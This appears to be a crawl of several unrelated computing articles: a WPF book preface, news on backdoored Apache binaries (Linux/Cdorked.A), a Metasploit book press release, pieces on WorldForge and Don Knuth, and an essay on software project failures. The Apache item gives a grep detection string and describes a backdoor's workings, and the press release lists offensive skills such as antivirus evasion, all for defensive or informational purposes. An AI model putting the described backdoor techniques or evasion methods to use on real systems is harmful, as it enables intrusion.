want to raise the abstraction and present the hows and whys of the platform design and show how the various APIs of the platform work together to add value to developers.This book is a reference; it is organized by technical topics so that you can flip back to a section later or flip forward to a section to answer a question. You do not need to read the book from cover to cover to gain value from it.This book covers most of WPF, not all of it. When I started writing the book, Chris Sells gave me an important piece of advice: “What you leave out is as important as what you include.” Because WPF is an immense platform, to present the big picture I had to omit parts of it. This book represents what I believe are the best landmarks from which to explore the platform.My goal with this book is to provide a map of the core concepts, how they relate to each other, and what motivated their design. I hope you’ll come away from this book with a broad understanding of WPF and be able to explore the depth of the platform yourself.PrerequisitesBefore reading this book, you should be familiar with .NET. You don’t need to be an expert, but you should be familiar with the basics of classes, methods, and events. The book uses only C# code in its examples. WPF is equally accessible in any .NET language; however, C# is what I use primarily for my development.OrganizationThis book is organized into eight chapters and a three-part appendix. My goal was to tell the story of the WPF platform in as few chapters as possible.Introduction (Chapter 1) briefly introduces the platform and explains how the seven major components of WPF fit together. This chapter also serves as a quick start for building applications with WPF, showing how to use the SDK tools and find content in the documentation.Applications (Chapter 2) covers the structure of applications built using WPF, as well as the application services and top-level objects used by applications.Controls (Chapter 3) covers both the major design patterns in WPF controls and the major control families in WPF. Controls are the fundamental building blocks of user interfaces in WPF; if you read only one chapter in the book, this is the one.Layout (Chapter 4) covers the design of the layout system, and an overview of the six stock layout panels that ship in WPF.Visuals (Chapter 5), provides an overview of the huge surface area that is the WPF visual system. The chapter covers typography, 2D and 3D graphics, animation, video, and audio.Data (Chapter 6) covers the basics of data sources, data binding, resources, and data transfer operations.Actions (Chapter 7) provides an overview of how events, commands, and triggers work to make things happen in your application.Styles (Chapter 8) covers the styling system in WPF. Styling enables the clean separation of the designer and developer by allowing a loose coupling between the visual appearance of a UI and the programmatic structure.The appendix, Base Services, drills down into some of the low-level services in WPF. Topics covered include threading model, the property and event system, input, composition, and printing.AcknowledgmentsThis book has been a massive undertaking for me. I’ve worked on articles, presentations, and white papers before, but nothing prepared me for the sheer volume of work it takes to condense a platform the size of WPF into a relatively short book.I’ve dedicated this book to my wife, Megan. She has been constantly supportive of this project (even when I brought a laptop on numerous vacations!) and everything else I do.The entire Avalon team has been a huge help in the creation of this book (and the product!). My manager, Ian Ellison-Taylor, supported my working on this project. Sam Bent, Jeff Bogdan, Vivek Dalvi, Namita Gupta, Mike Hillberg, Robert Ingebretsen, David Jenni, Lauren Lavoie, Ashraf Michail, Kevin Moore, Greg Schechter—the team members who helped are too many to list. I thoroughly enjoyed working with everyone on the team.I am grateful to Don Box for pushing me to write the book, and to Chris Sells for giving me sage advice even while we were creating competing books.My developmental editor, Michael Weinhardt, deserves a huge amount of credit for the quality of this book. Michael read, reread, edited, and re-edited every section of this book. He pushed me to never accept anything that isn’t great. All the errors and bad transitions in the book are purely my fault.Joan Murray, Karen Gettman, Julie Nahil, and the entire staff at Addison-Wesley, have done an amazing job dealing with me on this book. Stephanie Hiebert, my copy editor, spent countless hours pouring over my poor spelling, grammar, and prose, turning my ramblings into the English language.Finally, I want to thank the technical reviewers of this book. Erick Ellis, Joe Flanigan, Jessica Fosler, Christophe Nasarre, Nick Paldino, Chris Sells, and a host of others provided great feedback. Jessica gave me some of the deepest and most constructively critical feedback that I’ve ever received.I’m sure I’m forgetting many other people, and for that I apologize.Chris Anderson November 2006simplegeek.comNOTE1. This code name has no relationship to the Ruby programming language. | 计算机 |
2015-48/3654/en_head.json.gz/9854 | Compromised Apache binaries load malicious code
Researchers at web security firm Sucuri have discovered modified binaries in the open source Apache web server. The binaries will load malicious code or other web content without any user interaction. Only files that were installed using the cPanel administration tool are currently thought to be affected. ESET says that several hundred web servers have been compromised.
The attack has been named Linux/Cdorked.A and is difficult to detect: As cPanel doesn't install the web server through common package managers such as RPM, the verification mechanisms of the package managers won't be any help. The attackers also retain the file's timestamp to prevent it from being detected by its date in the directory listing. Sucuri says that searching for the open_tty character string provides a clear indication that a binary has been manipulated: grep -r open_tty /usr/local/apache/ doesn't return any results with Apache binaries that are intact.
Details on the functionality of the compromised Apache binaries have been released by the ESET researchers who have described how the malware uses a shared memory segment that is about six megabytes in size and allows read and write access to all users and groups. The malware stores its configuration files in this memory segment. The server is controlled through specially crafted HTTP requests that won't show up in the server's log file and which allow the attackers to open a backdoor through which they can inject shell commands. The HTTP connection appears to be hung during this while the shell is in use, which offers a further indication that an Apache server has been infected if an administrator looks for long-running HTTP connections. In addition to the backdoor, the attackers have also built in a mechanism that allows them to load content into other web pages behind the scenes. ESET says that, in certain conditions, this mechanism is used to redirect users to Blackhole exploits or pornographic pages. However, this is apparently only done once per day and IP address for each accessing browser.
An Apache server that has been infected with Linux/Cdorked. A can't easily be replaced because the file's immutable bit is set. chattr -ai /usr/local/apache/bin/httpd must be used to remove it before the server can be replaced with a web server that is intact.
"Darkleech", a predecessor< | 计算机 |
2015-48/3654/en_head.json.gz/10196 | Metasploit--New from No Starch Press: New Book Promises to be the Definitive Guide to Using Metasploit for Penetration Testing
San Francisco, CA, July 7, 2011—The free and open source Metasploit Framework is the most popular suite of penetration testing tools in the world, with more than one million downloads yearly. But despite its popularity, Metasploit has—until now—lacked an authoritative user's guide.
Hailed by HD Moore, the founder of the Metasploit Project, as "the best guide to the Metasploit Framework available today," Metasploit: The Penetration Tester's Guide (No Starch Press, July 2011, 328 pp., $49.95, ISBN 9781593272883) teaches readers how to identify vulnerabilities in networks by using Metasploit to launch simulated attacks. The book's authors, acknowledged Metasploit gurus, begin by building a foundation for penetration testing and establishing a methodology. From there, they explain the Framework's conventions, interfaces, and module system, and then move on to advanced penetration testing techniques, including network reconnaissance and enumeration, client-side attacks, devastating wireless attacks, and targeted social-engineering attacks.
"These days, everyone's a target," said No Starch Press founder Bill Pollock. "Consider Sony PlayStation, Lockheed Martin, the IMF, and Citigroup—all attacked in big ways, just this year. We're excited to release Metasploit: The Penetration Tester's Guide at this critical time because every business needs to make sure that its networks are secure. The Metasploit Framework is arguably the most powerful tool we have in our arsenal."
Metasploit: The Penetration Tester's Guide shows penetration testers how to:
Find exploits in unmaintained, misconfigured, and unpatched systems
Perform reconnaissance and find valuable information about a target
Bypass antivirus technologies and circumvent security controls
Integrate Nmap, NeXpose, and Nessus with Metasploit to automate discovery
Use the Meterpreter shell to launch attacks from inside a network
Harness stand-alone Metasploit utilities, third-party tools, and plug-ins
Learn how to write Meterpreter post exploitation modules and scripts
Whether readers' goals are to secure their own network or to put someone else's to the test, Metasploit: The Penetration Tester's Guide is without doubt the essential guide to using Metasploit.< | 计算机 |
2015-48/3654/en_head.json.gz/10895 | WorldForge: In Pursuit of Open Source, Massive, Online Games
by Howard Wen
Ultima Online is what gamers call a massive, multiplayer, online, role-playing game -- or MMORPG, for short. In this kind of environment, tens of thousands of players interact online. In some ways, it's like open source development, where a distributed collection of users (or developers) works together to make something happen.
One group of programmers is setting out to build a MMORPG using just such an open source model. WorldForge is an online community that formed three years ago to create such a game. The results of their early efforts were unveiled last year at LinuxTag 2001, with a working demo of their first online, role-playing game, Acorn.
Since that debut, the WorldForge community has gained a few hundred new contributors, but it's still a fairly small group. The game's announce list has 455 members, and on any given week, 10 to 20 folks commit code, content, or media. The group's focus now is on the development of a second game, Mason, and on working out the core principles around which clients and servers will communicate using the network protocol that WorldForge's programmers created, Atlas.
"The feel of the project has changed as people have come and gone, but all in all it feels as though we are really getting somewhere," says Al Riddoch, a 27-year-old from Southampton, U.K. Riddoch coordinates the development of Acorn and Mason when he's not working as a systems programmer for the University of Southampton. "Now we have more momentum than we have ever had before."
A task that's too big
The idea of an open source clone of Ultima Online hasn't evolved in the way it was originally envisioned. A few days after WorldForge was announced, one of the first decisions made by leaders of the effort was not to clone Ultima Online. They felt that the hack-and-slash play strategy of such games was boring and limited.
They also felt that from a technical standpoint, it was unrealistic to try to build a game that would serve tens of thousands of players simultaneously.
"We're a long way from cloning a commercial MMORPG, even if we wanted to," admits James Turner, a 21-year-old developer in Edinburgh, Scotland who works in Mac Mozilla development for an educational software company. He coordinates architectural development for WorldForge game servers and maintains a client-side session layer used by the project's various in-development clients.
So WorldForge focused on creating a generic game-engine client and server that would be flexible enough to support virtually any kind of online, role-playing game.
Obviously, a networking protocol is needed to run games like these. WorldForge programmers built such a "glue" to bind together large numbers of different clients and servers, along with editing tools for online games. Named Atlas, it's a technology that the community has been honing and aiming to have stand apart from the networking protocols used in commercial, online games.
Atlas is dynamically extensible and self-defining, so servers can communicate new types of entities and operations (actions) to the client. Clients can flexibly support various rule-sets and games without custom code, and new entities can be defined at will. This allows content creation to be much more iterative, and it enables a much looser client-server relationship than is traditionally possible. Present work on Atlas will also allow the protocol to be extended without the client or server needing to be restarted.
"Atlas is probably way ahead of anything being used commercially in terms of flexibility and power," says Riddoch. "We are frequently told that Atlas is over-engineered and too slow, but I believe that in the long run, it will pay off. As CPUs get faster, the cost of this flexibility will diminish, and performance will be less of a problem."
Building on simple games
The first game developed by the WorldForge team, Acorn, was mainly an experiment for them to learn how to develop a very basic role-playing game. Players compete online to raise and sell pigs in a world rendered in 2D, isometric graphics. Compared to the vast scale of Ultima Online, the size of Acorn's environment is much smaller and it serves fewer players; its gameplay is simpler, too.
Screen shot of the role-play game, Acorn.
The work on Mason, the second WorldForge game under development, aims to develop ways to build and manipulate objects in a role-playing game, and to better understand the physics engine. Mason's world features two races, humans and orcs, who compete for resource materials that include trees, animals, and iron ore. There will be no combat or spell-casting; threats to player-characters will come in the form of inanimate objects like deadly traps and poison. | 计算机 |
2015-48/3654/en_head.json.gz/11266 | For Journalists About Us Stanford Report, June 1, 2011
Stanford's Don Knuth, a pioneering hero of computer programming
In 1962, a young graduate student set about writing the definitive book on computer programming. Five decades and four volumes later, Don Knuth is still writing and the Stanford School of Engineering has its latest "Engineering Hero."
By Andrew Myers L.A. Cicero
Said Don Knuth: 'The very best computer programs rise to the level of art. They are beautiful.'
Some people are born before their time, and some after. Don Knuth was born precisely in his time. In the 1950s, Knuth was a student at Case Institute of Technology in Cleveland, Ohio, (now merged into Case Western Reserve University) and he answered the call for a job programming an IBM Type 650 computer, the first computer he had ever seen.
"Fortuity" hardly does the meeting justice. Knuth was born to program computers. It was as if computers, invented in the preceding decade, had been awaiting him.
Some 50 years later, thanks to his profound facility with algorithms, Knuth – pronounced "ka-NOOTH," as he notes with emphasis on his Web site – finds himself a reluctant celebrity and being toasted as one of eight in an inaugural class of Stanford Engineering Heroes that includes Bill Hewlett and Dave Packard, Vint Cerf, Ray Dolby, Dean Fred Terman, Charles Litton and William Durand.
"I'm not sure how I feel about this term hero," Knuth said with characteristic modesty. "I have heroes. I'm just a guy who has a way with computers. I'm not sure what I do rises to that level."
Yet, rise he does. Knuth is a giant in the field of computer science. His multi-volume, as-yet-unfinished magnum opus The Art of Computer Programming has sold more than a million copies. This, remember, is a tome on computer algorithms, not the latest self-help or diet book.
Heady company
To put Knuth's influence in perspective, American Scientist magazine in 1999 prepared a list of the best physical science books of the previous 100 years. There in the list of monographs, beside the likes of Einstein, Pauling, Dirac, Mandelbrot, Russell, von Neumann and Feynman, was Don Knuth. That is pretty heady company. It was an honor even the reticent Knuth had to acknowledge with a "Wow!"
Thus fame has come to Don Knuth. Acolytes recognize him on the street, pointing and whispering his name. They email him questions as if to an oracle, unaware perhaps that Knuth unburdened himself of email in 1990, before most even knew what email was, too busy to answer the near-constant flow. Silvered men, far closer to 70 than 17, corner him, albeit gently. They produce photos of fleeting encounters. They tell him: "You and I once met." Knuth kindly accedes to their designs on his time, chatting politely as if with an old friend.
The Art of Computer Programming has been a lifelong labor of love for Knuth. He began writing in 1962. The first volume was published in 1968. A second followed a year later, and a third in 1973. He was well into the fourth by 1977 and working on new editions of the first two, when he took a detour. A new programming challenge had occupied his mind.
The first three volumes of The Art of Computer Programming had been typeset in lead, a practice honed over the centuries since Gutenberg. The second edition, however, was typeset using a photo-optical process with substandard fonts and poor spacing. To this son of a typesetter, the results underwhelmed. The book was not beautiful.
Knuth set about fixing the problem. New machines, based on digital principles, were coming on the scene, although they still had not been harnessed to typeset mathematical formulas. His solutions – two programs known as TeX and METAFONT – would redefine the field of digital typography. Knuth planned for a year's detour; it took a decade. When he finished, he gave the works to the world, free to anyone who cared to use his programs.
He took up The Art of Computer Programming again in the late 1980s; he is now wrapping up volume four. If someone doesn't beat him to it, he hopes to complete three more.
Literate programming
And what of this remarkable facility with computers? "I guess my mind just works like a computer," he offered in an interview before the public event marking his Engineering Hero induction.
Knuth champions a programming philosophy known as "literate programming," encouraging – some say freeing – programmers to write programs by the flow of their thoughts, not according to the rules set down by the machine.
Literate programs can be read and understood by real people. They are written as ordinary human language, almost like an essay in which the traditional macros and source code are inserted within explanations of the author's logic and intentions. Such programming, according to Knuth, yields better programs by exposing poor logic and design decisions. The programs are their own documentation, flowing naturally out of the process of creation.
And that discussion leads back to his most famous work. When asked to explain the word "art" in the title of his book, the professor grew reflective. It could, after all, have been called simply Computer Programming. "In one way 'art' is like 'artificial,' meaning that it is not found in nature but made by human beings," he said. "There also are elements of fine art – of the ineffable – in there, too. The very best computer programs rise to the level of art. They are beautiful."
This insistence on the unquantifiable in his work has much to do with Knuth's love of music. His first dream was to be a musician. His royalties from The Art of Computer Programming have afforded him at least one luxury. He maintains a full-scale working pipe organ in his home and plays it regularly. In music, as with mathematics, he sees patterns and order and symmetry. "I'm convinced that Tchaikovsky would have loved combinatorial mathematics if he had lived a century later," he said.
A nod to Stanford Engineering
So, how did this devout Lutheran typesetter's son from Milwaukee, a graduate of Case and Caltech, end up at Stanford? Knuth gave a nod to the fact that Stanford, even then, was a world leader in computer science under George Forsythe, the man who, Knuth acknowledges, virtually invented the field.
At Stanford, the department was large enough that the young and driven Knuth was freed of academic politics to focus on his work. "I was just one of the boys here," he said. "I knew I wouldn't have to fight to keep the department going as with smaller departments at other schools. This is where the best people were and where I could do what I did best."
And then, of course, there were the students. "The kids were just so darn smart here," he said. "Many people think that good faculty means good students, but it's really the other way around."
Asked if, in his long career, there was anything about the computer age that had surprised him, Knuth responded flatly, "Everything."
And what if computers had not become what they have to our society and our culture? Where else might his career have led? Knuth paused to turn over the possibilities in his head. After a moment, he said, "I figure I would have been a computer scientist anyway. For me it has always been about solving interesting and challenging questions. I would still have studied algorithms even if fate had turned out differently than it did and if there wasn't a penny in programming."
Flowing from the lips of a man who spent a lifetime on a quest to write a solitary work, the same man who embraced a decade-long detour to redefine digital typesetting only to give the work away, it comes as no surprise.
Hero indeed.
Andrew Myers is associate director of communications for the School of Engineering.
Don Knuth's website
Website for The Art of Computer Programming
Stanford 'Engineering Heroes' website
Watch Knuth's 'All Questions Answered' Engineering Hero lecture | 计算机 |
2015-48/3654/en_head.json.gz/11396 | Why Software Fails
We waste billions of dollars each year on entirely preventable mistakes
By Robert N. Charette
Posted 2 Sep 2005 | 3:18 GMT
Photo: Graham Barclay/Bloomberg News/Landov
Market Crash: After its new automated supply-chain management system failed last October, leaving merchandise stuck in company warehouses, British food retailer Sainsbury's had to hire 3000 additional clerks to stock its shelves.
Have you heard the one about the disappearing warehouse? One day, it vanished--not from physical view, but from the watchful eyes of a well-known retailer's automated distribution system. A software glitch had somehow erased the warehouse's existence, so that goods destined for the warehouse were rerouted elsewhere, while goods at the warehouse languished. Because the company was in financial trouble and had been shuttering other warehouses to save money, the employees at the "missing" warehouse kept quiet. For three years, nothing arrived or left. Employees were still getting their paychecks, however, because a different computer system handled the payroll. When the software glitch finally came to light, the merchandise in the warehouse was sold off, and upper management told employees to say nothing about the episode.
This story has been floating around the information technology industry for 20-some years. It's probably apocryphal, but for those of us in the business, it's entirely plausible. Why? Because episodes like this happen all the time. Last October, for instance, the giant British food retailer J Sainsbury PLC had to write off its US $526 million investment in an automated supply-chain management system. It seems that merchandise was stuck in the company's depots and warehouses and was not getting through to many of its stores. Sainsbury was forced to hire about 3000 additional clerks to stock its shelves manually [see photo above, "Market Crash"].
Sources: Business Week, CEO Magazine, Computerworld, InfoWeek, Fortune, The New York Times, Time, and The Wall Street Journal.
*Converted to U.S. dollars using current exchange rates as of press time.
+Converted to U.S. dollars using exchange rates for the year cited, according to the International Trade Administration, U.S. Department of Commerce.
**Converted to U.S. dollars using exchange rates for the year cited, according to the Statistical Abstract of the United States, 1996.
Click on image for a larger view.
This is only one of the latest in a long, dismal history of IT projects gone awry [see table above, "Software Hall of Shame" for other notable fiascoes]. Most IT experts agree that such failures occur far more often than they should. What's more, the failures are universally unprejudiced: they happen in every country; to large companies and small; in commercial, nonprofit, and governmental organizations; and without regard to status or reputation. The business and societal costs of these failures--in terms of wasted taxpayer and shareholder dollars as well as investments that can't be made--are now well into the billions of dollars a year.
The problem only gets worse as IT grows ubiquitous. This year, organizations and governments will spend an estimated $1 trillion on IT hardware, software, and services worldwide. Of the IT projects that are initiated, from 5 to 15 percent will be abandoned before or shortly after delivery as hopelessly inadequate. Many others will arrive late and over budget or require massive reworking. Few IT projects, in other words, truly succeed.
The biggest tragedy is that software failure is for the most part predictable and avoidable. Unfortunately, most organizations don't see preventing failure as an urgent matter, even though that view risks harming the organization and maybe even destroying it. Understanding why this attitude persists is not just an academic exercise; it has tremendous implications for business and society.
SOFTWARE IS EVERYWHERE. It's what lets us get cash from an ATM, make a phone call, and drive our cars. A typical cellphone now contains 2 million lines of software code; by 2010 it will likely have 10 times as many. General Motors Corp. estimates that by then its cars will each have 100 million lines of code.
The average company spends about 4 to 5 percent of revenue on information technology, with those that are highly IT dependent--such as financial and telecommunications companies--spending more than 10 percent on it. In other words, IT is now one of the largest corporate expenses outside employee costs. Much of that money goes into hardware and software upgrades, software license fees, and so forth, but a big chunk is for new software projects meant to create a better future for the organization and its customers.
Governments, too, are big consumers of software. In 2003, the United Kingdom had more than 100 major government IT projects under way that totaled $20.3 billion. In 2004, the U.S. government cataloged 1200 civilian IT projects costing more than $60 billion, plus another $16 billion for military software.
Any one of these projects can cost over $1 billion. To take two current examples, the computer modernization effort at the U.S. Department of Veterans Affairs is projected to run $3.5 billion, while automating the health records of the UK's National Health Service is likely to cost more than $14.3 billion for development and another $50.8 billion for deployment.
Such megasoftware projects, once rare, are now much more common, as smaller IT operations are joined into "systems of systems." Air traffic control is a prime example, because it relies on connections among dozens of networks that provide communications, weather, navigation, and other data. But the trick of integration has stymied many an IT developer, to the point where academic researchers increasingly believe that computer science itself may need to be rethought in light of these massively complex systems.
When a project fails , it jeopardizes an organization's prospects. If the failure is large enough, it can steal the company's entire future. In one stellar meltdown, a poorly implemented resource planning system led FoxMeyer Drug Co., a $5 billion wholesale drug distribution company in Carrollton, Texas, to plummet into bankruptcy in 1996.
IT failure in government can imperil national security, as the FBI's Virtual Case File debacle has shown. The $170 million VCF system, a searchable database intended to allow agents to "connect the dots" and follow up on disparate pieces of intelligence, instead ended five months ago without any system's being deployed [see "Who Killed the Virtual Case File?" in this issue].
IT failures can also stunt economic growth and quality of life. Back in 1981, the U.S. Federal Aviation Administration began looking into upgrading its antiquated air-traffic-control system, but the effort to build a replacement soon became riddled with problems [see photo, "Air Jam," at top of this article]. By 1994, when the agency finally gave up on the project, the predicted cost had tripled, more than $2.6 billion had been spent, and the expected delivery date had slipped by several years. Every airplane passenger who is delayed because of gridlocked skyways still feels this cancellation; the cumulative economic impact of all those delays on just the U.S. airlines (never mind the passengers) approaches $50 billion.
Worldwide, it's hard to say how many software projects fail or how much money is wasted as a result. If you define failure as the total abandonment of a project before or shortly after it is delivered, and if you accept a conservative failure rate of 5 percent, then billions of dollars are wasted each year on bad software.
For example, in 2004, the U.S. government spent $60 billion on software (not counting the embedded software in weapons systems); a 5 percent failure rate means $3 billion was probably wasted. However, after several decades as an IT consultant, I am convinced that the failure rate is 15 to 20 percent for projects that have budgets of $10 million or more. Looking at the total investment in new software projects--both government and corporate--over the last five years, I estimate that project failures have likely cost the U.S. economy at least $25 billion and maybe as much as $75 billion.
Of course, that $75 billion doesn't reflect projects that exceed their budgets--which most projects do. Nor does it reflect projects delivered late--which the majority are. It also fails to account for the opportunity costs of having to start over once a project is abandoned or the costs of bug-ridden systems that have to be repeatedly reworked.
Then, too, there's the cost of litigation from irate customers suing suppliers for poorly implemented systems. When you add up all these extra costs, the yearly tab for failed and troubled software conservatively runs somewhere from $60 billion to $70 billion in the United States alone. For that money, you could launch the space shuttle 100 times, build and deploy the entire 24-satellite Global Positioning System, and develop the Boeing 777 from scratch--and still have a few billion left over.
Why do projects fail so often?
Among the most common factors:
Unrealistic or unarticulated project goals
Inaccurate estimates of needed resources
Badly defined system requirements
Poor reporting of the project's status
Unmanaged risks
Poor communication among customers, developers, and users
Use of immature technology
Inability to handle the project's complexity
Sloppy development practices
Poor project management
Stakeholder politics
Commercial pressures
Of course, IT projects rarely fail for just one or two reasons. The FBI's VCF project suffered from many of the problems listed above. Most failures, in fact, can be traced to a combination of technical, project management, and business decisions. Each dimension interacts with the others in complicated ways that exacerbate project risks and problems and increase the likelihood of failure.
Consider a simple software chore: a purchasing system that automates the ordering, billing, and shipping of parts, so that a salesperson can input a customer's order, have it automatically checked against pricing and contract requirements, and arrange to have the parts and invoice sent to the customer from the warehouse.
The requirements for the system specify four basic steps. First, there's the sales process, which creates a bill of sale. That bill is then sent through a legal process, which reviews the contractual terms and conditions of the potential sale and approves them. Third in line is the provision process, which sends out the parts contracted for, followed by the finance process, which sends out an invoice.
Let's say that as the first process, for sales, is being written, the programmers treat every order as if it were placed in the company's main location, even though the company has branches in several states and countries. That mistake, in turn, affects how tax is calculated, what kind of contract is issued, and so on.
The sooner the omission is detected and corrected, the better. It's kind of like knitting a sweater. If you spot a missed stitch right after you make it, you can simply unravel a bit of yarn and move on. But if you don't catch the mistake until the end, you may need to unravel the whole sweater just to redo that one stitch.
If the software coders don't catch their omission until final system testing--or worse, until after the system has been rolled out--the costs incurred to correct the error will likely be many times greater than if they'd caught the mistake while they were still working on the initial sales process.
And unlike a missed stitch in a sweater, this problem is much harder to pinpoint; the programmers will see only that errors are appearing, and these might have several causes. Even after the original error is corrected, they'll need to change other calculations and documentation and then retest every step.
In fact, studies have shown that software specialists spend about 40 to 50 percent of their time on avoidable rework rather than on what they call value-added work, which is basically work that's done right the first time. Once a piece of software makes it into the field, the cost of fixing an error can be 100 times as high as it would have been during the development stage.
If errors abound, then rework can start to swamp a project, like a dinghy in a storm. What's worse, attempts to fix an error often introduce new ones. It's like you're bailing out that dinghy, but you're also creating leaks. If too many errors are produced, the cost and time needed to complete the system become so great that going on doesn't make sense.
In the simplest terms, an IT project usually fails when the rework exceeds the value-added work that's been budgeted for. This is what happened to Sydney Water Corp., the largest water provider in Australia, when it attempted to introduce an automated customer information and billing system in 2002 [see box, "Case Study #2"]. According to an investigation by the Australian Auditor General, among the factors that doomed the project were inadequate planning and specifications, which in turn led to numerous change requests and significant added costs and delays. Sydney Water aborted the project midway, after spending AU $61 million (US $33.2 million).
All of which leads us to the obvious question: why do so many errors occur?
Software project failures have a lot in common with airplane crashes. Just as pilots never intend to crash, software developers don't aim to fail. When a commercial plane crashes, investigators look at many factors, such as the weather, maintenance records, the pilot's disposition and training, and cultural factors within the airline. Similarly, we need to look at the business environment, technical management, project management, and organizational culture to get to the roots of software failures.
Chief among the business factors are competition and the need to cut costs. Increasingly, senior managers expect IT departments to do more with less and do it faster than before; they view software projects not as investments but as pure costs that must be controlled.
Political exigencies can also wreak havoc on an IT project's schedule, cost, and quality. When Denver International Airport attempted to roll out its automated baggage-handling system, state and local political leaders held the project to one unrealistic schedule after another. The failure to deliver the system on time delayed the 1995 opening of the airport (then the largest in the United States), which compounded the financial impact manyfold.
Even after the system was completed, it never worked reliably: it chewed up baggage, and the carts used to shuttle luggage around frequently derailed. Eventually, United Airlines, the airport's main tenant, sued the system contractor, and the episode became a testament to the dangers of political expediency.
A lack of upper-management support can also damn an IT undertaking. This runs the gamut from failing to allocate enough money and manpower to not clearly establishing the IT project's relationship to the organization's business. In 2000, retailer Kmart Corp., in Troy, Mich., launched a $1.4 billion IT modernization effort aimed at linking its sales, marketing, supply, and logistics systems, to better compete with rival Wal-Mart Corp., in Bentonville, Ark. Wal-Mart proved too formidable, though, and 18 months later, cash-strapped Kmart cut back on modernization, writing off the $130 million it had already invested in IT. Four months later, it declared bankruptcy; the company continues to struggle today.
Frequently, IT project managers eager to get funded resort to a form of liar's poker, overpromising what their project will do, how much it will cost, and when it will be completed. Many, if not most, software projects start off with budgets that are too small. When that happens, the developers have to make up for the shortfall somehow, typically by trying to increase productivity, reducing the scope of the effort, or taking risky shortcuts in the review and testing phases. These all increase the likelihood of error and, ultimately, failure.
A state-of-the-art travel reservation system spearheaded by a consortium of Budget Rent-A-Car, Hilton Hotels, Marriott, and AMR, the parent of American Airlines, is a case in point. In 1992, three and a half years and $165 million into the project, the group abandoned it, citing two main reasons: an overly optimistic development schedule and an underestimation of the technical difficulties involved. This was the same group that had earlier built the hugely successful Sabre reservation system, proving that past performance is no guarantee of future results.
After crash investigators consider the weather as a factor in a plane crash, they look at the airplane itself. Was there something in the plane's design that caused the crash? Was it carrying too much weight?
In IT project failures, similar questions invariably come up regarding the project's technical components: the hardware and software used to develop the system and the development practices themselves. Organizations are often seduced by the siren song of the technological imperative--the uncontrollable urge to use the latest technology in hopes of gaining a competitive edge. With technology changing fast and promising fantastic new capabilities, it is easy to succumb. But using immature or untested technology is a sure route to failure.
In 1997, after spending $40 million, the state of Washington shut down an IT project that would have processed driver's licenses and vehicle registrations. Motor vehicle officials admitted that they got caught up in chasing technology instead of concentrating on implementing a system that met their requirements. The IT debacle that brought down FoxMeyer Drug a year earlier also stemmed from adopting a state-of-the-art resource-planning system and then pushing it beyond what it could feasibly do.
A project's sheer size is a fountainhead of failure. Studies indicate that large-scale projects fail three to five times more often than small ones. The larger the project, the more complexity there is in both its static elements (the discrete pieces of software, hardware, and so on) and its dynamic elements (the couplings and interactions among hardware, software, and users; connections to other systems; and so on). Greater complexity increases the possibility of errors, because no one really understands all the interacting parts of the whole or has the ability to test them.
Sobering but true: it's impossible to thoroughly test an IT system of any real size. Roger S. Pressman pointed out in his book Software Engineering, one of the classic texts in the field, that "exhaustive testing presents certain logistical problems....Even a small 100-line program with some nested paths and a single loop executing less than twenty times may require 10 to the power of 14 possible paths to be executed." To test all of those 100 trillion paths, he noted, assuming each could be evaluated in a millisecond, would take 3170 years.
All IT systems are intrinsically fragile. In a large brick building, you'd have to remove hundreds of strategically placed bricks to make a wall collapse. But in a 100 000-line software program, it takes only one or two bad lines to produce major problems. In 1991, a portion of ATandamp;T's telephone network went out, leaving 12 million subscribers without service, all because of a single mistyped character in one line of code.
Sloppy development practices are a rich source of failure, and they can cause errors at any stage of an IT project. To help organizations assess their software-development practices, the U.S. Software Engineering Institute, in Pittsburgh, created the Capability Maturity Model, or CMM. It rates a company's practices against five levels of increasing maturity. Level 1 means the organization is using ad hoc and possibly chaotic development practices. Level 3 means the company has characterized its practices and now understands them. Level 5 means the organization quantitatively understands the variations in the processes and practices it applies.
As of January, nearly 2000 government and commercial organizations had voluntarily reported CMM levels. Over half acknowledged being at either level 1 or 2, 30 percent were at level 3, and only 17 percent had reached level 4 or 5. The percentages are even more dismal when you realize that this is a self-selected group; obviously, companies with the worst IT practices won't subject themselves to a CMM evaluation. (The CMM is being superseded by the CMM-Integration, which aims for a broader assessment of an organization's ability to create software-intensive systems.)
Immature IT practices doomed the U.S. Internal Revenue Service's $4 billion modernization effort in 1997, and they have continued to plague the IRS's current $8 billion modernization. It may just be intrinsically impossible to translate the tax code into software code--tax law is complex and based on often-vague legislation, and it changes all the time. From an IT developer's standpoint, it's a requirements nightmare. But the IRS hasn't been helped by open hostility between in-house and outside programmers, a laughable underestimation of the work involved, and many other bad practices.
THE PILOT'S ACTIONS JUST BEFORE a plane crashes are always of great interest to investigators. That's because the pilot is the ultimate decision-maker, responsible for the safe operation of the craft. Similarly, project managers play a crucial role in software projects and can be a major source of errors that lead to failure.
Back in 1986, the London Stock Exchange decided to automate its system for settling stock transactions. Seven years later, after spending $600 million, it scrapped the Taurus system's development, not only because the design was excessively complex and cumbersome but also because the management of the project was, to use the word of one of its own senior managers, "delusional." As investigations revealed, no one seemed to want to know the true status of the project, even as more and more problems appeared, deadlines were missed, and costs soared [see box, "Case Study #3"].
The most important function of the IT project manager is to allocate resources to various activities. Beyond that, the project manager is responsible for project planning and estimation, control, organization, contract management, quality management, risk management, communications, and human resource management.
Bad decisions by project managers are probably the single greatest cause of software failures today. Poor technical management, by contrast, can lead to technical errors, but those can generally be isolated and fixed. However, a bad project management decision--such as hiring too few programmers or picking the wrong type of contract--can wreak havoc. For example, the developers of the doomed travel reservation system claim that they were hobbled in part by the use of a fixed-price contract. Such a contract assumes that the work will be routine; the reservation system turned out to be anything but.
Project management decisions are often tricky precisely because they involve tradeoffs based on fuzzy or incomplete knowledge. Estimating how much an IT project will cost and how long it will take is as much art as science. The larger or more novel the project, the less accurate the estimates. It's a running joke in the industry that IT project estimates are at best within 25 percent of their true value 75 percent of the time.
There are other ways that poor project management can hasten a software project's demise. A study by the Project Management Institute, in Newton Square, Pa., showed that risk management is the least practiced of all project management disciplines across all industry sectors, and nowhere is it more infrequently applied than in the IT industry. Without effective risk management, software developers have little insight into what may go wrong, why it may go wrong, and what can be done to eliminate or mitigate the risks. Nor is there a way to determine what risks are acceptable, in turn making project decisions regarding tradeoffs almost impossible.
Poor project management takes many other forms, including bad communication, which creates an inhospitable atmosphere that increases turnover; not investing in staff training; and not reviewing the project's progress at regular intervals. Any of these can help derail a software project.
The last area that investigators look into after a plane crash is the organizational environment. Does the airline have a strong safety culture, or does it emphasize meeting the flight schedule above all? In IT projects, an organization that values openness, honesty, communication, and collaboration is more apt to find and resolve mistakes early enough that rework doesn't become overwhelming.
